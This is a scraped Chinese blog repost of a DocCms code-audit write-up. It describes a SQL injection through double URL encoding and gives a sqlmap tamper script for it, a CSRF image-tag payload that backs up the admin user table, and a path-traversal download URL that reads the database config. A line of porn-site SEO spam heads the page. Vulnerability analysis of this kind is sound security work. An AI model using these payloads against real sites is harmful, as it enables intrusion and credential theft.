日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當(dāng)前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

代码审计之DocCms漏洞分析

發(fā)布時(shí)間:2023/11/29 编程问答 35 豆豆
生活随笔 收集整理的這篇文章主要介紹了 代码审计之DocCms漏洞分析 小編覺得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.

0x01 前言

DocCms[音譯:稻殼Cms] ,定位于為企業(yè)、站長、開發(fā)者、網(wǎng)絡(luò)公司、VI策劃設(shè)計(jì)公司、SEO推廣營銷公司、網(wǎng)站初學(xué)者等用戶 量身打造的一款全新企業(yè)建站、內(nèi)容管理系統(tǒng),服務(wù)于企業(yè)品牌信息化建設(shè),也適應(yīng)用個(gè)人、門戶網(wǎng)站建設(shè)!

0x02 環(huán)境搭建

DocCms官網(wǎng):http://www.doccms.com

程序源碼:DocCms2016

下載地址:https://pan.baidu.com/s/1pLclifL

0x03 SQL注入

代碼分析

在/content/search/index.php中,首先對(duì)參數(shù)keyword進(jìn)行非法字符檢測,

進(jìn)一步追溯checkSqlStr函數(shù),看代碼如何過濾,在/inc/function.php中

checkSqlStr函數(shù)對(duì)傳入的字符串進(jìn)行正則匹配,檢測是否函數(shù)非法字符。

繼續(xù)看在/content/search/index.php中的get_search_result函數(shù):

參數(shù)keyword進(jìn)行非法字符檢測后,進(jìn)行url解碼,然后拼接到SQL語句中執(zhí)行。

如果我們傳入雙重url編碼的字符串,將繞過非法字符檢測,然后經(jīng)urldecode解碼,帶入數(shù)據(jù)庫中執(zhí)行,導(dǎo)致SQL注入漏洞存在。

漏洞利用

雙重URLencode編碼繞過,可通過編寫tamper繞過URLencode雙重編碼,tamper腳本如下:

#!/usr/bin/env python import re from urllib import quote from lib.core.data import kb from lib.core.enums import PRIORITY__priority__ = PRIORITY.NORMALdef dependencies():pass def tamper(payload, **kwargs):retVal = payloadretVal = quote(quote(retVal)) return retVal

通過SQLMAP加載tamper腳本,獲取數(shù)據(jù)庫敏感數(shù)據(jù)

0x04 CSRF

代碼分析

在\doccms\admini\controllers\system\back.php

export函數(shù)直接對(duì)提交上來的參數(shù)tables/sizelimit進(jìn)行處理,導(dǎo)出sql備份文件,未對(duì)訪問來源進(jìn)行有效驗(yàn)證,導(dǎo)致數(shù)據(jù)庫備份模塊存在CSRF漏洞。

漏洞利用

1、構(gòu)造CSRF漏洞利用代碼,只備份管理員用戶表doc_user:

<H2> CRSFTester</H2> <img src="http://127.0.0.1:80/admini/index.php?m=system&s=bakup&a=export&tables[]=doc_user&sizelimit=2048&dosubmit=開始備份數(shù)據(jù)" width="0" height="0" border="0"/>

2、在網(wǎng)站首頁在線留言提交CSRF漏洞利用代碼:

3、當(dāng)管理員在后臺(tái)查看留言信息時(shí),自動(dòng)備份數(shù)據(jù)庫到/doccms/temp/data目錄下:

0x05 任意文件下載

代碼分析

在\doccms\admini\controllers\system\back.php中,

download函數(shù)只對(duì)文件名進(jìn)行簡單的判斷,然后把filename拼接到路徑中進(jìn)行下載,導(dǎo)致網(wǎng)站存在任意文件下載漏洞。

漏洞利用

1、構(gòu)造url下載全局配置文件獲取敏感信息:http://127.0.0.1/admini/index.php?m=system&s=bakup&a=download&filename=../../config/doc-config-cn.php

?

?2、獲取到數(shù)據(jù)庫賬號(hào)密碼等敏感信息:

?

未完,待續(xù)。

?

總結(jié)

以上是生活随笔為你收集整理的代码审计之DocCms漏洞分析的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò),歡迎將生活随笔推薦給好友。